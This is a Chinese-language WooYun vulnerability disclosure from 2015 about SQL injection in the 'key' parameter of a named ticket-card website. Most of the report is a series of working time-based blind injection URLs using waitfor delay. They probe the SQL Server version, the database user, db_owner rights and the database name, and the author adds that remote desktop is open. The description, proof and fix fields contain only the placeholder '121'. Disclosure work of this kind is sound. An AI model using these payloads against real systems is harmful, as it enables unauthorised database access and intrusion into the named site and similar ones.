漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
121
详细说明:
http://www.txcards.com.cn/default.aspx?stype=1&key=a
参数 key
直接加单引号
http://www.txcards.com.cn/default.aspx?stype=1&key=a';if substring((select @@version),22,4)=2005 waitfor delay '0:0:5'--
出错了
换个写法
http://www.txcards.com.cn/default.aspx?stype=1&key=a';if (substring(@@version,22,1)='2005') waitfor delay '0:0:5'--
延时,貌似过滤了select
用户名的长度
http://www.txcards.com.cn/default.aspx?stype=1&key=a';if len(system_user)=6 waitfor delay '0:0:5'--
用户名
http://www.txcards.com.cn/default.aspx?stype=1&key=a';if (substring(user_name(),1,6)='dangao') waitfor delay '0:0:5'--
蛋糕?
http://www.txcards.com.cn/default.aspx?stype=1&key=a';if 1= IS_MEMBER('db_owner') waitfor delay '0:0:5'--
dbo 权限
数据库的名字
http://www.txcards.com.cn/default.aspx?stype=1&key=a';if (substring(db_name(),1,10)='citsticket
') waitfor delay '0:0:5'--
默认3389是打开的
就这样了
over++
漏洞证明:
121
修复方案:
121
版权声明:转载请注明来源 日出东方@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-08-23 09:54
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无